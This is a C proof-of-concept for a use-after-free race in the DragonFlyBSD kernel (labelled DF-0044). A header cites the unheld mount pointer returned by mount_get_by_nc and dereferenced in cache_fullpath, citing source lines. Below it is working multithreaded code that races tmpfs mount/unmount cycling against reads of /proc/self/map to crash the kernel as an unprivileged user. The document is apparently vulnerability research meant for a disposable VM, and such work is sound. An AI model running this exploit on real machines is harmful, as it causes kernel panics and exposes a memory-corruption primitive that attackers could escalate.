/*
 * DF-0044 PoC -- mount_get_by_nc unheld-return UAF via cache_fullpath
 *               racing dounmount.
 *
 * CONFIRMED CODE-LEVEL BUG (master DEV, X86_64_GENERIC):
 *   - sys/kern/vfs_mount.c:1235-1248  mount_get_by_nc() returns mp
 *     WITHOUT calling mount_hold(mp).  Token released at :1245, return
 *     at :1247 -- no hold taken.  Contrast vfs_getvfs() at :413-424
 *     which does mount_hold(mp) at :420-421 (comment at :410-411
 *     documents the contract: "the returned mp is held and the caller
 *     is expected to drop it via mount_drop()").  mountlist_scan() at
 *     :756/:784 also mount_hold()s before dropping the token.
 *     mount_get_by_nc is the lone outlier and breaks the invariant.
 *   - sys/kern/vfs_cache.c:5214  sole caller cache_fullpath() takes the
 *     returned mp and at :5224 dereferences new_mp->mnt_ncmounton AFTER
 *     the mountlist_token has been released.  It never mount_drop()s.
 *   - sys/kern/vfs_syscalls.c:1040,1066-1069,1108-1117  dounmount()
 *     removes mp from mountlist, zeroes mnt_ncmounton, waits for
 *     mnt_refs==0, then mount_drop(mp) -> kfree(mp, M_MOUNT) once
 *     mnt_hold hits 0.  That kfree frees the very struct the unheld
 *     pointer in cache_fullpath still points at -> UAF.
 *
 * The ONLY caller of cache_fullpath(guess=1) is procfs_map.c:181
 * (vn_fullpath(p, vp, ..., 1) when reading /proc/$pid/map).  So the
 * deref side must read /proc/$pid/map for a vnode whose path traverses
 * the cycled mountpoint.
 *
 * This PoC drives BOTH sides concurrently.  The binary is placed INSIDE
 * the cycled mount, so its text vp is on the cycled mount.  Reading
 * /proc/self/map then drives vn_fullpath(p, p_textvp, ..., 1) ->
 * cache_fullpath(guess=1) -> mount_get_by_nc.  Meanwhile, N cyclers
 * mount+unmount the path to free struct mount through kfree.
 *
 * Build (DragonFlyBSD, as unpriv user): cc -pthread -O2 -o mount_uaf ...
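 * Run  (place binary INSIDE the mountpoint; vfs.usermount=1;
 *      disposable VM): ./mount_uaf [mountpoint] [seconds] [cyclers]
 *      e.g. ./mount_uaf /tmp/df0044/m 60
 *      Defaults: mountpoint = current directory, seconds = 30,
 *      cyclers = 2 (at most 16 cycler threads are started).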
 *
 * NOTE: this race is extremely tight on a non-INVARIANTS kernel.
 * The deref is a single memory read; the unmount's kfree is gated by
 * an mnt_refs drain that usually completes only after the deref.
 * A panic in _cache_hold on a bogus ncp, a slab-allocator complaint,
 * or a fatal trap in vfs_cache.c during the deref window is the
 * expected signature when the race is won.  If the guest stays up,
 * the race was not won this run -- the code-level proof in
 * VERDICT.md stands regardless.
 */

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/types.h>

/* tmpfs mount-info struct (sys/vfs/tmpfs/tmpfs_mount.h).
 * Declared locally and passed as the data argument of mount(2) by
 * mount_cycler().
 *
 * We need to set ta_root_uid = getuid() so the mount is owned by us
 * and we can unmount it without MNT_FORCE (which is privileged).
 * Otherwise tmpfs_statfs overwrites mnt_stat.f_owner with tm_root->tn_uid
 * (default 0 = root), and sys_unmount then denies us with EPERM
 * (mnt_stat.f_owner != our uid && no priv).
 *
 * NOTE(review): the field types below are hand-expanded stand-ins for the
 * typedefs named in the trailing comments.  The layout must match the
 * kernel header byte-for-byte -- confirm against the target release. */
#define TMPFS_ARGS_VERSION 2
struct tmpfs_mount_info {
	int   ta_version;          /* caller stores TMPFS_ARGS_VERSION here */
	long long ta_nodes_max;    /* ino_t */
	long long ta_size_max;     /* off_t */
	unsigned long long ta_maxfsize_max;  /* size_t */
	unsigned int ta_root_uid;  /* uid_t */
	unsigned int ta_root_gid;  /* gid_t */
	unsigned short ta_root_mode; /* mode_t */
};

/* Path that the cycler threads mount and unmount; filled in by main()
 * before any thread is started and read-only afterwards. */
static char mpoint[512];

/*
 * State shared between main() and the worker threads.
 *
 * These are _Atomic rather than volatile: the counters are bumped with ++
 * from several threads at once, and volatile does not make that
 * read-modify-write indivisible (increments could be lost, and the
 * unsynchronised access is a data race).  With _Atomic, plain ++, reads and
 * assignments are sequentially-consistent atomic operations, so existing
 * users need no source changes.
 */
static _Atomic int go = 1;                             /* cleared by main() to stop workers */
static _Atomic unsigned long long iter_deref = 0;      /* successful reads of /proc/self/map */
static _Atomic unsigned long long iter_free  = 0;      /* completed mount+unmount cycles */
static _Atomic unsigned long long iter_free_fail = 0;  /* failed mount or unmount attempts */

/* Free side: cycle mount+umount of mpoint to recycle struct mount
 * through kfree.  No MNT_FORCE needed (we own the mount). */
static void *
mount_cycler(void *a)
{
	(void)a;
	while (go) {
		struct tmpfs_mount_info mi;
		memset(&mi, 0, sizeof(mi));
		mi.ta_version = TMPFS_ARGS_VERSION;
		mi.ta_root_uid = getuid();
		mi.ta_root_gid = getgid();
		mi.ta_root_mode = 0755;
		int mr = mount("tmpfs", mpoint, 0, &mi);
		if (mr != 0) {
			/* Maybe leftover from a peer thread -- try cleanup. */
			iter_free_fail++;
			unmount(mpoint, 0);
			continue;
		}
		/* Plain unmount: nothing holds vnodes on the fresh tmpfs. */
		int ur = unmount(mpoint, 0);
		if (ur == 0)
			iter_free++;
		else
			iter_free_fail++;
	}
	return NULL;
}

/*
 * Deref side worker.  Until `go` is cleared, opens /proc/self/map, reads
 * it to EOF (or first error) in 64 KiB chunks, and closes it again.
 * iter_deref is incremented once per successful read() call.  If the open
 * fails, the thread backs off for 50 microseconds and retries.
 *
 * Per the file header, reading this procfs node is what makes the kernel
 * resolve the path of each vnode-backed mapping, including this binary's
 * text vnode inside mpoint.
 *
 * The thread argument is unused; always returns NULL.
 */
static void *
map_reader(void *a)
{
	char chunk[65536];
	int mapfd;

	(void)a;
	while (go) {
		mapfd = open("/proc/self/map", O_RDONLY);
		if (mapfd < 0) {
			usleep(50);
			continue;
		}
		for (;;) {
			ssize_t got = read(mapfd, chunk, sizeof(chunk));

			if (got <= 0)
				break;
			iter_deref++;
		}
		close(mapfd);
	}
	return NULL;
}

/*
 * Parse a non-negative decimal command-line argument.
 *
 * s    NUL-terminated argument text.
 * max  largest value accepted.
 * out  receives the parsed value on success; untouched on failure.
 *
 * Returns 0 on success, -1 if s does not start with a digit, has trailing
 * characters, overflows unsigned long, or exceeds max.
 */
static int
parse_uint_arg(const char *s, unsigned int max, unsigned int *out)
{
	char *end = NULL;
	unsigned long v;

	/* strtoul() itself would accept leading blanks and a sign (and
	 * silently negate); require the text to start with a digit. */
	if (s[0] < '0' || s[0] > '9')
		return -1;

	errno = 0;
	v = strtoul(s, &end, 10);
	if (errno == ERANGE || *end != '\0' || v > max)
		return -1;

	*out = (unsigned int)v;
	return 0;
}

/*
 * Usage: mount_uaf [mountpoint] [seconds] [cyclers]
 *
 *   mountpoint  path to cycle (default: current working directory)
 *   seconds     run time (default 30)
 *   cyclers     number of mount_cycler threads (default 2, capped at 16)
 *
 * Starts the cycler threads and four map_reader threads, lets them run for
 * the requested time, clears `go`, joins every thread that was actually
 * started, and prints the counters.
 *
 * Exit status: 0 after a normal run, 1 if a thread could not be created,
 * 2 on a bad argument or getcwd() failure.
 */
int main(int argc, char **argv)
{
	enum { MAX_CYCLERS = 16, NUM_READERS = 4 };

	pthread_t tfree[MAX_CYCLERS], tderef[NUM_READERS];
	unsigned int secs = 30;
	unsigned int nfree = 2;
	unsigned int started_free = 0;   /* cyclers successfully created */
	unsigned int started_deref = 0;  /* readers successfully created */
	int rc = 0;

	if (argc > 1) {
		int len = snprintf(mpoint, sizeof(mpoint), "%s", argv[1]);

		/* A truncated path would silently target a different
		 * directory, so refuse it. */
		if (len < 0 || (size_t)len >= sizeof(mpoint)) {
			fprintf(stderr, "DF-0044: mountpoint path too long\n");
			return 2;
		}
	} else if (getcwd(mpoint, sizeof(mpoint)) == NULL) {
		perror("getcwd"); return 2;
	}

	if (argc > 2 && parse_uint_arg(argv[2], ~0u, &secs) != 0) {
		fprintf(stderr, "DF-0044: invalid seconds value '%s'\n", argv[2]);
		return 2;
	}
	if (argc > 3 && parse_uint_arg(argv[3], ~0u, &nfree) != 0) {
		fprintf(stderr, "DF-0044: invalid cycler count '%s'\n", argv[3]);
		return 2;
	}
	if (nfree > (unsigned int)MAX_CYCLERS) {
		/* Keep the banner below truthful about what really runs. */
		fprintf(stderr, "DF-0044: cycler count %u capped at %d\n",
			nfree, (int)MAX_CYCLERS);
		nfree = (unsigned int)MAX_CYCLERS;
	}

	fprintf(stderr, "DF-0044: cycling mount at %s (uid=%u gid=%u)\n",
		mpoint, (unsigned int)getuid(), (unsigned int)getgid());
	fprintf(stderr, "DF-0044: %u cycler threads + 4 /proc/self/map readers\n",
		nfree);
	fprintf(stderr, "DF-0044: running %u seconds\n", secs);

	/* The counters advance only after a successful create, so they
	 * always equal the number of joinable threads. */
	while (started_free < nfree) {
		int err = pthread_create(&tfree[started_free], NULL,
		    mount_cycler, NULL);

		if (err != 0) {
			fprintf(stderr, "DF-0044: pthread_create (cycler): %s\n",
				strerror(err));
			rc = 1;
			break;
		}
		started_free++;
	}
	while (rc == 0 && started_deref < (unsigned int)NUM_READERS) {
		int err = pthread_create(&tderef[started_deref], NULL,
		    map_reader, NULL);

		if (err != 0) {
			fprintf(stderr, "DF-0044: pthread_create (reader): %s\n",
				strerror(err));
			rc = 1;
			break;
		}
		started_deref++;
	}

	if (rc == 0)
		sleep(secs);

	/* Stop the workers and join only the threads that exist; joining
	 * an uninitialised pthread_t is undefined. */
	go = 0;
	for (unsigned int i = 0; i < started_free; i++)
		pthread_join(tfree[i], NULL);
	for (unsigned int i = 0; i < started_deref; i++)
		pthread_join(tderef[i], NULL);

	fprintf(stderr,
		"DF-0044: deref=%llu  free_ok=%llu  free_fail=%llu\n",
		(unsigned long long)iter_deref,
		(unsigned long long)iter_free,
		(unsigned long long)iter_free_fail);
	if (rc == 0)
		fprintf(stderr, "DF-0044: still alive -- race not won this run\n");
	return rc;
}
